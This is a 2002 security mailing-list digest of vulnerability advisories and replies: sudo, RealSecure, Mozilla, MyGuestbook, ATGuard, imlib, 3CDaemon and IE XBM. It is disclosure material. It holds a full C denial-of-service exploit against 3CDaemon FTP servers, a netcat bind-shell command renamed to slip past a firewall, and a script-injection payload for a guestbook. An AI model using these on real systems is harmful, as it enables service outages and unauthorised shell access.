        if (rval == -1 || (wall.st_mode & S_IXUSR) == 0 ||
            (fp = popen(WALL_PROG, "w")) == NULL) {
                syslog(LOG_NOTICE,
                    "rwall message received but could not 

SuSE Security Announcement: sudo (SuSE-SA:2002:014)

2002-04-30 Thread Sebastian Krahmer


-BEGIN PGP SIGNED MESSAGE-

__

SuSE Security Announcement

Package:sudo
Announcement-ID:SuSE-SA:2002:014
Date:   Tue Apr 30 16:00:00 MEST 2002
Affected products:  6.4, 7.0, 7.1, 7.2, 7.3, 8.0,
SuSE Firewall Adminhost VPN,
SuSE Linux Admin-CD for Firewall,
SuSE Linux Enterprise Server,
SuSE Linux Connectivity Server
Vulnerability Type: local privilege escalation
Severity (1-10):6
SuSE default package:   yes
Other affected systems: All systems with sudo installed.

Content of this advisory:
1) security vulnerability resolved: Heap overflow in sudo.
   problem description, discussion, solution and upgrade information
2) pending vulnerabilities, solutions, workarounds
3) standard appendix (further information)

__

1)  problem description, brief discussion, solution, upgrade information

The sudo program allows local users to execute certain configured
commands with root privileges. Sudo contains a heap overflow in its
prompt assembling function. The input used to create the password prompt
is user controlled and not properly length-checked before being copied to certain
heap locations. This allows local attackers to overflow the heap of sudo,
thus executing arbitrary commands as root.
We would like to thank GlobalInterSec for finding and researching
this vulnerability.
As a temporary workaround you may remove the setuid bit from sudo by
issuing the following command as root: chmod -s /usr/bin/sudo.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command rpm -Fhv file.rpm to apply
the update.
Our maintenance customers are being notified individually. The packages
are being offered to install from the maintenance web.

i386 Intel Platform:

SuSE-8.0
ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap1/sudo-1.6.5p2-79.i386.rpm
  b54f68ff4b32f9d920f2f1ff887d1ddc
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sudo-1.6.5p2-79.src.rpm
  fd1ccf6fe52c6b999c5ed24a2f3a4e65

SuSE-7.3
ftp://ftp.suse.com/pub/suse/i386/update/7.3/ap1/sudo-1.6.3p7-83.i386.rpm
  80edbf5caf02c519cf2c01d6ba76d22f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/sudo-1.6.3p7-83.src.rpm
  77962932840740ce5e3dfe57a887592d

SuSE-7.2
ftp://ftp.suse.com/pub/suse/i386/update/7.2/ap1/sudo-1.6.3p6-92.i386.rpm
  669aa8db134e39f462cb9f2648f6735f
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/sudo-1.6.3p6-92.src.rpm
  249b1ef0135dcfede3648982900e277c

SuSE-7.1
ftp://ftp.suse.com/pub/suse/i386/update/7.1/ap1/sudo-1.6.3p6-91.i386.rpm
  6b3b84f0a4c687e91da179937b87048a
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/sudo-1.6.3p6-91.src.rpm
  bf59a6b200a0fb130f3528ce23698be0

SuSE-7.0
ftp://ftp.suse.com/pub/suse/i386/update/7.0/ap1/sudo-1.6.3p6-90.i386.rpm
  5b67ef9fed383242111953d942c62174
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/7.0/zq1/sudo-1.6.3p6-90.src.rpm
  c35f6390b360500b7b649e4590a748cc

SuSE-6.4
ftp://ftp.suse.com/pub/suse/i386/update/6.4/ap1/sudo-1.5.9p1-87.i386.rpm
  82d98116eccc73c7a0ce03a51e9b5378
source rpm:
ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/sudo-1.5.9p1-87.src.rpm
  e75e2608036a963a7339fe4632a2550b

Sparc Platform:

SuSE-7.3
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/ap1/sudo-1.6.3p7-33.sparc.rpm
  bd492b6d601ceb30486e3e970a2211a3
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/sudo-1.6.3p7-33.src.rpm
  d2435d180cdd76647e1f1416e93c2420

SuSE-7.1
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/ap1/sudo-1.6.3p6-37.sparc.rpm
  bbad36265f93fac25d59f8c26b1ccd52
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/sudo-1.6.3p6-37.src.rpm
  a328d2eb0fdc816341a68febfeb5a33a

SuSE-7.0
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/ap1/sudo-1.6.3p6-36.sparc.rpm
  48e7b360b45bae0b3e9e90b3bf945f75
source rpm:
ftp://ftp.suse.com/pub/suse/sparc/update/7.0/zq1/sudo-1.6.3p6-36.src.rpm
  bd8f11a8916340e0d243ae1cc647df26

AXP Alpha Platform:

SuSE-7.1
ftp://ftp.suse.com/pub/suse/axp/update/7.1/ap1/sudo-1.6.3p6-40.alpha.rpm
  4505dd58fe309ef0a4515db6a6980ec4
source rpm:
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/sudo-1.6.3p6-40.src.rpm
  85dfbe40da4d93d54d3c16f6489a7f32
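The advisory describes user-controlled prompt text being copied into heap memory without a proper length check. The block below is an added example and is not sudo's code: it shows the shape of a safe prompt expander, where a counting pass sizes the heap buffer before anything is copied and the write pass refuses to exceed that size. The escapes it understands (%u for user, %h for host, %% for a literal percent) and the template string are assumptions made for the example, modelled loosely on a -p style option rather than copied from sudo.

```c
/* Added example: expanding an untrusted prompt template into a heap
 * buffer that is sized from a full counting pass first. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Which escape (if any) starts at p, and what it expands to.
 * A lone or unknown '%' is not an escape and is copied literally. */
static const char *escape_at(const char *p, const char *user, const char *host)
{
    if (p[0] != '%') return NULL;
    switch (p[1]) {
    case 'u': return user;
    case 'h': return host;
    case '%': return "%";
    default:  return NULL;
    }
}

/* Exact length of the expanded prompt, NUL excluded. Every escape is
 * measured here, so the allocation below can never come up short. */
size_t expanded_prompt_len(const char *tmpl, const char *user, const char *host)
{
    size_t n = 0;
    for (const char *p = tmpl; *p; p++) {
        const char *rep = escape_at(p, user, host);
        if (rep) { n += strlen(rep); p++; } else n++;
    }
    return n;
}

/* Returns a malloc'd expansion or NULL. The write pass mirrors the counting
 * pass and is additionally bounded, so a divergence between the two becomes
 * a refused expansion rather than a heap overflow. */
char *expand_prompt(const char *tmpl, const char *user, const char *host)
{
    size_t need = expanded_prompt_len(tmpl, user, host);
    char *out = malloc(need + 1);
    if (!out) return NULL;
    size_t w = 0;
    for (const char *p = tmpl; *p; p++) {
        const char *rep = escape_at(p, user, host);
        size_t len = rep ? strlen(rep) : 1;
        if (w + len > need) { free(out); return NULL; }   /* never trust the count blindly */
        if (rep) { memcpy(out + w, rep, len); p++; }
        else out[w] = *p;
        w += len;
    }
    out[w] = '\0';
    return out;
}

int main(void)
{
    /* Constructed sample template; the user and host names are made up. */
    char *s = expand_prompt("[sudo] password for %u@%h: ", "alice", "box1");
    if (s) { printf("%s\n", s); free(s); }
    return 0;
}
```

The point of the bounded write pass is that correctness no longer depends on two pieces of code staying in perfect agreement; if someone later adds an escape to one pass and forgets the other, the result is a NULL return, not memory corruption. Removing the setuid bit, as the advisory suggests, remains the right stopgap until the package is updated.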


ISS Advisory: Remote Denial of Service Vulnerability in RealSecure Network Sensor

2002-04-30 Thread X-Force

-BEGIN PGP SIGNED MESSAGE-

Internet Security Systems Security Advisory
April 30, 2002

Remote Denial of Service Vulnerability in RealSecure Network Sensor

Synopsis:

ISS X-Force has learned of a denial of service (DoS) vulnerability that
affects Internet Security Systems RealSecure Network Sensor. This
vulnerability may allow remote attackers to crash RealSecure by sending
specially crafted packets to network segments monitored by RealSecure.
RealSecure X-Press Update 4.3 contains a fix for the DHCP vulnerability
and is available for immediate download on the ISS download center.

Affected Versions:

RealSecure Network Sensor 5.x, XPU 3.4 and later
RealSecure Network Sensor 6.0, XPU 3.4 and later
RealSecure Network Sensor 6.5

Description:

RealSecure Network Sensor has three informational signatures associated
with DHCP (Dynamic Host Configuration Protocol): DHCP_ACK (7131),
DHCP_Discover (7132), and DHCP_Request (7133). These signatures contain
a flaw that will result in an illegal attempt to de-reference a null
memory pointer when RealSecure detects certain types of DHCP traffic.
This action may generate an exception error or a segmentation fault
which can cause the RealSecure sensor to crash. This vulnerability was
introduced in RealSecure Network Sensor 6.5. XPU 3.4 delivered the
vulnerable DHCP signatures to older RealSecure product lines including
6.0 and 5.x.

It may be possible for remote attackers to create specially-crafted DHCP
traffic to cause the sensor to malfunction or crash entirely. The three
DHCP signatures were disabled by default in Network Sensor 5.x and 6.0.
The signatures were enabled by default in Network Sensor 6.5 within the
Maximum policy. However, if these signatures are not enabled,
RealSecure Network Sensor is not vulnerable to these attacks.

Recommendations:

X-Force recommends that all RealSecure customers tune their policies to
their environments. RealSecure X-Press Update 4.3 contains a fix for the
DHCP vulnerability. X-Press Update 4.3 is available for download on the
ISS download center:  http://www.iss.net/download/.

DHCP traffic is commonly blocked at perimeter firewalls. Network
administrators are advised to assess their network perimeter defenses
routinely. Exploitation of this vulnerability is blocked by proper
filtering of DHCP traffic on UDP port 67.


__

About Internet Security Systems (ISS)
Founded in 1994, Internet Security Systems (ISS) (Nasdaq: ISSX) is a
pioneer and world leader in software and services that protect critical
online resources from an ever-changing spectrum of threats and misuse.
Internet Security Systems is headquartered in Atlanta, GA, with
additional operations throughout the Americas, Asia, Australia, Europe
and the Middle East.

Copyright (c) 2002 Internet Security Systems, Inc. All rights reserved
worldwide.

Permission is hereby granted for the electronic redistribution of this
document. It is not to be edited or altered in any way without the
express written consent of the Internet Security Systems X-Force. If you
wish to reprint the whole or any part of this document in any other
medium excluding electronic media, please email [EMAIL PROTECTED] for
permission.

Disclaimer: The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties, implied or otherwise, with regard to
this information or its use. Any use of this information is at the
user's risk. In no event shall the author/distributor (Internet Security
Systems X-Force) be held liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.

X-Force PGP Key available on MIT's PGP key server and PGP.com's key
server,
as well as at http://www.iss.net/security_center/sensitive.php

Please send suggestions, updates, and comments to: X-Force

-BEGIN PGP SIGNATURE-
Version: 2.6.2

iQCVAwUBPM7pJjRfJiV99eG9AQHBBAQAmh7q8UVXJcdNbSpuiSA0oyVSgLhqc1O2
bQyGOeNbbWhTLWQ3pMzcBjx4vjTE34dI4T4OT7PLlGVuvcW4fLG70Lq+Fsr34gQj
E17UWKvqvD+AUXvcMq0gxjV15uykkmhy01zZ+Cwn5LsjWXjzpy4r/a7OzZ13Lzrq
u7+bVixmr70=
=m3XN
-END PGP SIGNATURE-



RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Thor Larholm

> Demonstration:
> ==
>
> A fully dynamic proof-of-concept demonstration
> of this issue is available at
> http://security.greymagic.com/adv/gm001-ns/.

As some of you may have noticed, the above proof-of-concept does not work in
Mozilla 1.0 Release Candidate 1.

Don't get your hopes high about this though, the issue has not been fixed in
moz1rc1 - the XMLHttpRequest was simply broken in this version of the
browser for unknown reasons, a fact not mentioned in the release notes. When
trying to use it, either nothing happens or the browser crashes. The
proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would
work fine in moz1rc1 if the XMLHttpRequest object could be used at all.

The Mozilla XML-Extras project also includes a document.load method that is
used to load XML documents. The same issue applies to this method, and a
proof-of-concept demonstration that also works in moz1rc1 can be found at

http://jscript.dk/2002/4/NS6Tests/documentload.html

Regards
Thor Larholm
Jubii A/S - Internet Programmer



Levcgi.coms MyGuestbook JavaScript Injection Vulnerability

2002-04-30 Thread BrainRawt .


  ___  __  _____
|\  \  |\   \  |\   \|\ \|\  \  |\_\
| \   \__|\  \ | \   \__|\   \ | \   \ \ \ \  \ | |   |\   \   |
\  \___   | \ \   \ \ \   \_| \_|  \ \|___| \   \__|
  \  \   \_|\  \_ \ \   \__|\   \ \ \  _ \  \ \   \
   \  \   \\ \   \ \ \   \ \ \   \ \ \ |\ http://rawt.daemon.sh
\  \___\\ \___\ \ \___\ \ \___\ \ \| \_\  \ \___\
 \ |   | \ |   | \ |   | \ |   | \ |   |\ ||   \ |   |
  \|___|  \|___|  \|___|  \|___|  \|___| \||\|___|


Levcgi.coms MyGuestbook JavaScript Injection Vulnerability
Discovered By BrainRawt ([EMAIL PROTECTED])

About MyGuestbook:
--
Highly customizable guestbook that was released on Feb. 20, 2002, and
can be downloaded at http://www.levcgi.com/programs.cgi?program=myguestbook

According to the website, ...myGuestbook has been downloaded 1298 times!

Vulnerable (tested) Versions:

MyGuestbook v 1.0

Vendor Contact:

4-28-02 - Emailed [EMAIL PROTECTED]

4-30-02 - No reply from the author, and I have decided not to wait since I
   never got a reply about another concern I had several months ago
   involving one of his cgi scripts.

Vulnerability:

myguestbook improperly filters input to the guestbook, making the guestbook
prone to cross-site scripting attacks by malicious visitors to the site. This
could be a medium to high concern when mixed with a website that uses
cookies.

Exploit (POC):

Sign up and post using the name
<script>alert('evil+java+script+here')</script>

or

When posting comments just insert the
<script>alert('evil+java+script+here')</script>
into the comments field.


--
Knowledge is Power! How Powerful are you? - BrainRawt
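The mitigation for this bug class is to encode guestbook fields at the point where they are written back into a page. What follows is an added example and not MyGuestbook's code (which is a CGI script): an html_escape() in C that handles the five characters that let text break out of HTML element or attribute context, reports the full required length the way snprintf does so that truncation is detectable, and never leaves a half-written entity in the output. The sample entry is constructed.

```c
/* Added example: output encoding for untrusted text before it is placed in HTML. */
#include <stdio.h>
#include <string.h>

/* Entity for a character that must not appear raw in HTML text, else NULL. */
static const char *entity_for(char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Escapes `s` into `out` (capacity `outsz`), always NUL-terminating when
 * outsz > 0. Returns the length the complete escaped form needs, so a caller
 * detects truncation with `ret >= outsz`. Once a token does not fit, nothing
 * further is written: the output is always a whole-token prefix, never a
 * partial entity such as "&l". Passing outsz == 0 just measures. */
size_t html_escape(char *out, size_t outsz, const char *s)
{
    size_t need = 0, wrote = 0;
    for (const char *p = s; *p; p++) {
        const char *e = entity_for(*p);
        size_t l = e ? strlen(e) : 1;
        const char *src = e ? e : p;
        if (outsz && wrote == need && need + l < outsz) {
            memcpy(out + wrote, src, l);
            wrote += l;
        }
        need += l;
    }
    if (outsz) out[wrote] = '\0';
    return need;
}

int main(void)
{
    /* Constructed guestbook entry of the kind described in the advisory. */
    const char *name = "<script>alert('x')</script>";
    char safe[128];
    size_t need = html_escape(safe, sizeof safe, name);
    printf("%s%s\n", safe, need >= sizeof safe ? " [truncated]" : "");
    return 0;
}
```

Escaping on output rather than filtering on input is deliberate: a filter has to anticipate every encoding trick a visitor might use, whereas an encoder only has to know the context it writes into. The single-quote entity is numeric because &apos; is not defined in HTML 4, which is what browsers of this era render.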







Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread BlueScreen

As far as I see, the article you gave me at tooleaky.zensoft.com mostly deals
with outbound connections.
The ATGuard problem still goes further; it is also a problem with inbound
connections.

I use a Xitami Webserver on Port 50080 for testing purposes.
This Xitami Webserver is (currently) allowed to accept all connections on
all ports (this is also a configuration problem,
but most people just allow inbound connections from any address to any port
for an application).

So, I just did the following:

I:\>cd netcat

I:\netcat>nc -e c:\winnt\system32\cmd.exe -p 500 -l

I tried to connect to port 500 with telnet: ATGuard fires up as it is
supposed to. So, now I did the following:

I:\netcat>copy nc.exe xiwin32.exe
1 Datei(en) kopiert. (Translation for the curious non-German
readers: 1 file copied :)

I:\netcat>xiwin32.exe -e c:\winnt\system32\cmd.exe -p 500 -l

Trying it with telnet again, I got a very nice shell without any notice from
ATGuard.

That's why I also mentioned trojan horses in my advisories - just renaming
your trojan horse to the name of a program that is allowed
to accept inbound connections will do the trick.

> There is no ultimate way to control all outbound communication. If you use
> your own low-level drivers, no personal firewall can stop you.

Surely there is no ultimate way. But if you are not aware that a problem
exists, you can't think about solutions.
Also, you perhaps will think that your personal firewall is perfectly safe
while it isn't.

Best regards,



---
BlueScreen / Florian Hobelsberger (UIN: 101782087)
Member of:
www.IT-Checkpoint.net
www.Hackeinsteiger.de
www.DvLdW.de

==
To encrypt classified messages, please download and use this PGP-Key:

http://www.florian-hobelsberger.de/BlueScreen-PGP-PubKey.txt
==




Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread UMusBKidN

Hi,

Ye Olde Disclaimer: The information contained in this email is believed to be true. 
However, exhaustive regression testing has not been performed. No guarantees or 
warranties are implicitly or explicitly granted. Use the information within at your 
own risk.

Tested AtGuard version: 3.21.05
Tested OS's: NT4 SP6a, Win95 (don't hit me, I'm cheap)

BlueScreen wrote:
 
> -
> itcp advisory 13 [EMAIL PROTECTED]
> http://www.it-checkpoint.net/advisory/12.html
> April 29th, 2002
> -
>
> ITCP Advisory 13: Bypassing of ATGuard Firewall possible
> -

*snip*

> DETAILS
*snip*
> Sadly ATGuard doesn't save the file paths / doesn't use checksums (would be
> much better), to
> determine whether the executed program is really the one that is allowed to
> connect to all hosts on port 80.
> It just uses the filename (in this case IEXPLORE.EXE).

Only if you've created your rule in interactive learning mode. See discussion below.

*snip*

> SOLUTION
>
> There doesn't exist a solution, since ATGuard is not developed anymore. We
> were not able to test the Norton Personal Firewall
> for this problem, since no one of us owns it. We are contacting Norton
> directly with this Advisory.

Not quite correct. The bug reported in BlueScreen's advisory does exist. However, 
either the method of testing was incomplete, or the report was incomplete. Also, there 
is a workaround.

AtGuard has the ability to create firewall rules on the fly (in its interactive
learning mode). When a connection is attempted and AtGuard cannot find a matching 
rule, in interactive learning mode the user is presented with a window containing 
four options. Two of those options allow the user to specify whether the connection 
should be allowed or blocked, this one time only. The other two of those options allow 
the user to create a rule for particular connections (that may either block or allow 
the connections). This works on either incoming or outgoing connections.

When a rule is created in interactive learning mode, *only the application executable 
name* is stored in the rulebase. This is the bug that BlueScreen pointed out. Without 
a path to the application file in the rulebase, any application with a similar name 
can make use of the firewall rule (block or allow, as the case may be).

However, AtGuard also allows the user to create their own firewall rules manually. 
Click on the dashboard or tray icon, and launch the Settings menu item. Click the 
Add button, create a rule, and make sure you specify an application that the rule 
applies to (on the Application tab, click Application Shown Above, click the Browse 
button, and specify the proper application with the File Dialog box). You will find 
the full path to the file specified in the rule. Shut down your machine, and start it 
up again, and you'll find the full path still there. You can verify the full path in 
the registry under the key:

HKEY_LOCAL_MACHINE\SOFTWARE\WRQ\IAM\FirewallObjects\Applications

Workaround: Manually create firewall rules instead of using interactive learning mode 
to create rules. If you do use interactive learning mode, you should reopen the 
Settings menu, and manually adjust the Application Shown Above so it shows the 
full path to the application that the rule applies to (you apparently don't have to 
trash all your current rules). This *appears* to resolve the issue (from my brief 
testing, YMMV).

Of course, this still wouldn't prevent someone from replacing the specified file with 
malware. However, if your machine has been compromised to that level, it seems to me
you've got more to worry about than a few firewall rules :/

It should be noted that AtGuard rules may be created that allow or block access to 
*all* applications. Such rules appear to not be affected by this bug.

> ADDITIONAL INFORMATION
> Vendor has not been contacted. (since he doesn't exist anymore).

Actually, the original vendor does exist: http://www.wrq.com. They simply don't sell 
the product any more. From what I can tell, the original firewall has been 
sufficiently morphed by Symantec so that it no longer has much resemblance to AtGuard. 
Thus, I don't think comparisons between products from these two vendors are fair or 
valid.

-UMus B. KidN




AW: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread Jonas Koch

Most products use checksums to detect replaced or modified applications.

But there are other problems with outbound filters. Most personal firewalls
do not detect if a malicious program uses a 'trusted' application to
transmit data (look at tooleaky.zensoft.com). I have tested several products
with a method similar to Bob Sundling's and only BlackICE PC Protection 3.5
stopped communication (Norton PF, Tiny PF and ZoneAlarm did not stop it).

There is no ultimate way to control all outbound communication. If you use
your own low-level drivers, no personal firewall can stop you.

Jonas




Re: ITCP Advisory 13: Bypassing of ATGuard Firewall possible

2002-04-30 Thread Jim Hill

BlueScreen in 014401c1ef8d$1bb66510$0100a8c0@BlueScreenPrimary:

> ATGuard can be fooled to think that a disallowed program is allowed to
> connect to the internet.

This is a well known problem and has been discussed at length on
http://grc.com/lt/scoreboard.htm.

A.M Janssen has written a utility which monitors the hashes (SHA1,
Ripe MD-160 or Haval) for the applications in AtGuard's ruleset
http://www.capimonitor.nl/nisfilecheck11.zip. 

It has to be separately scheduled so it's not as good as real
time checks by the firewall but very useful nonetheless.




Security Update: [CSSA-2002-019.0] Linux: imlib processes untrusted images

2002-04-30 Thread security


__

Caldera International, Inc.  Security Advisory

Subject:Linux: imlib processes untrusted images
Advisory number:CSSA-2002-019.0
Issue date: 2002 April 29
Cross reference:
__


1. Problem Description

Imlib versions prior to 1.9.13 would fall back to loading images
via the NetPBM package. NetPBM has various problems itself
that make it unsuitable for loading untrusted images. This
may allow attackers to construct images that, when loaded by
a viewer using Imlib, could cause crashes or potentially, the
execution of arbitrary code.

In addition, this version (1.9.14) also includes some further
fixes from the imlib team.


2. Vulnerable Supported Versions

System                       Package
----------------------------------------------------------------

OpenLinux 3.1.1 Server       prior to imlib-1.9.14-1.i386.rpm
                             prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1.1 Workstation  prior to imlib-1.9.14-1.i386.rpm
                             prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1 Server         prior to imlib-1.9.14-1.i386.rpm
                             prior to imlib-devel-1.9.14-1.i386.rpm

OpenLinux 3.1 Workstation    prior to imlib-1.9.14-1.i386.rpm
                             prior to imlib-devel-1.9.14-1.i386.rpm


3. Solution

The proper solution is to install the latest packages.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS

4.2 Packages

56ed4f4cdf53abc39ba462021496314b  imlib-1.9.14-1.i386.rpm
743951ea75a12121f6696a57a6a4d091  imlib-devel-1.9.14-1.i386.rpm

4.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

4.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS

4.5 Source Packages

7f31fe77f6e8086aced4bb412b46e55c  imlib-1.9.14-1.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS

5.2 Packages

de20299b700ab3918bed0c782abcd6c3  imlib-1.9.14-1.i386.rpm
ba96a381bb7c60f20ce74b5645c02fa8  imlib-devel-1.9.14-1.i386.rpm

5.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

5.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS

5.5 Source Packages

060c0a51023524bb1681ac6b68405bd7  imlib-1.9.14-1.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS

6.2 Packages

72ab762b5b78035581fa9200cac775d7  imlib-1.9.14-1.i386.rpm
7e918173391601c5df401be3c7644a78  imlib-devel-1.9.14-1.i386.rpm

6.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

6.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

6.5 Source Packages

4c864ed09fd05a3740e3a8d6acab2349  imlib-1.9.14-1.src.rpm


7. OpenLinux 3.1 Workstation

7.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS

7.2 Packages

0e03563711a6c9902b6d7d2016a45c84  imlib-1.9.14-1.i386.rpm
d0bbec107ff9b58d8851a0cb680bedf3  imlib-devel-1.9.14-1.i386.rpm

7.3 Installation

rpm -Fvh imlib-1.9.14-1.i386.rpm
rpm -Fvh imlib-devel-1.9.14-1.i386.rpm

7.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS

7.5 Source Packages

5eed6f4ffeeebf13e266a4078bc45442  imlib-1.9.14-1.src.rpm


8. References

Specific references for this advisory:
none


Caldera OpenLinux security resources:
http://www.caldera.com/support/security/index.html

Caldera UNIX security resources:
http://stage.caldera.com/support/security/

This security fix closes Caldera incidents sr862212, fz520437,
erg712001.


9. Disclaimer

Caldera International, Inc. is not responsible for the misuse
of any of the information we provide on this website and/or
through our security advisories. Our 

3CDaemon DoS exploit

2002-04-30 Thread skyrim msh

3Cdaemon 2.0 revision 10 for the Windows platform contains a BOF
vulnerability at all times, including the login prompt. When 400+ chars are
sent to the FTP server, it crashes immediately. Remote exploit is included.
For more details see the exploit as well.

greets,
skyrim - [EMAIL PROTECTED]
MaD SKiLL 'H' - http://www.madskill.tk



/* MaD SKiLL 'H'
* MsH 4 life! http://www.madskill.tk
* *Private Release*
*
* 3CDaemon 2.0 revision 10 DoS
*
* 11:12 14-4-2002: BOF flaw found by skyrim
*  1:00 15-4-2002: exploit done.
* 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
*
* This program will exploit the buffer overflow vulnerability of
* 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
* at any time they're sent.
*
* Tested on:
* [OS][version]
*  Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
*
*
* I don't know if this will work on versions other than the one I tested it on.
* Have fun.
*
* Crew shouts go to: MsH, DFA, uDc
* Personal shouts to: mannie, primus, amok, torment, talented, warsteam,
* frodo, maxxo, xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
*
* skyrim ([EMAIL PROTECTED])
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define BOFSIZE 420

void banner(void)
{
    printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n   ---\n");
}

/* print the last error and quit */
void E(char *msg) { perror(msg); exit(1); }

int main(int argc, char *argv[])
{
    static char ownage[BOFSIZE];   /* the oversized login string */
    int sockfd, sockfd2, n;

    struct sockaddr_in server_addr;
    struct hostent *server;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s hostname/ip port\n", argv[0]);
        exit(1);
    }
    banner();
    memset(ownage, 'A', BOFSIZE);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) E("Error occured during opening socket");
    server = gethostbyname(argv[1]);
    if (server == NULL) E("Error occured during host lookup -No such host?-\n");

    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    memcpy(&server_addr.sin_addr.s_addr, server->h_addr, server->h_length);
    server_addr.sin_port = htons(atoi(argv[2]));
    printf("Connecting to target FTP server... ");
    if (connect(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0)
        E("Error occured during connecting\n");
    printf("Connected, Probing BOF... \n");
    /* ownage carries no terminating NUL, so send its full size rather than strlen() it */
    n = write(sockfd, ownage, sizeof(ownage));
    if (n < 0) E("Error occured during writing to socket");
    close(sockfd);
    sockfd2 = socket(AF_INET, SOCK_STREAM, 0);
    printf("Done, checking if server is dead.. \n");
    sleep(5);
    if (connect(sockfd2, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        printf("Couldn't establish connection: It seems like it died! =)\n");
        exit(0);
    }
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}



RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)

2002-04-30 Thread Rui Miguel Silva Seabra

Funny,

so much rant about not receiving any contact from Netscape (AOL
subsidiary) or about not even giving prior notification to the
developers about the bug AND, all in all, no one even posts to a 
bugzilla entry on bugzilla.mozilla.org which is the best place for bug
reports on Mozilla (ie, *not marketdroid webpages*).

This is either ignorance of bugzilla (bad, but I can understand that), or
intention to defame the mozilla developers, which is very bad, since a
lot of them dedicate their free time to providing us an extremely
standards compliant, Free Software, cross platform web browser, and so
we actually owe them a favour (so to speak).

If it is ignorance, I will, then, try to educate:
  1. load your favorite browser, and go to http://bugzilla.mozilla.org
  2. submit bug
  3. if very urgent, go to irc.mozilla.org, /join #mozillazine and
SCREAM SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID,
please? I can help with details.

In any other case than having first tried to do that, this rant seems
absolutely unnecessary.

Regards

-- 
+ No matter how much you do, you never do enough -- unknown
+ Whatever you do will be insignificant,
| but it is very important that you do it -- Gandhi
+ So let's do it...?





IE/OE6.0 cannot handle malformed XBM files

2002-04-30 Thread Adam [wp-ckkl]

hello,

Internet Explorer [only 6.0] allows the usage of XBM graphic files
and tries to display them whenever they're used in any HTML file
[as IMG tag] or when attached to an e-mail.

XBM structure is very easy:
it is a text file with C-like syntax and e.g. looks like

#define picture_width ?? // picture width
#define picture_height ?? // picture height
static unsigned char picture_bits[] = { //hex picture data
  };

IE doesn't properly check the content of XBM files,
and you may force the browser/e-mail client to hang up,
which will end up in their silent exit because of the Access
Violation exception [as shown with a great help of windbg,
it is generated inside mshtml.dll].

IE doesn't check the width and height of the image, so you
may write whatever you want and IE will try to interpret it,
trying to allocate enough memory for an oversized buffer.

When previewed f.ex. in Outlook Express, malformed e-mail
may force this client to exit (and others that rely on IE).

For an example of such malformed e-mail download one from
my homepage and try to open by clicking it in Windows Explorer.
http://www.sztolnia.pl/hack/xbmbug/xbmbug.eml
Don't forget to run OE first :)

Adam Baszczyk
[02-01-11] [en/pl] Home page/Domowa http://www.mykakee.com
[02-01-31] [pl] Pirotechnika http://pyro.pieklo.org
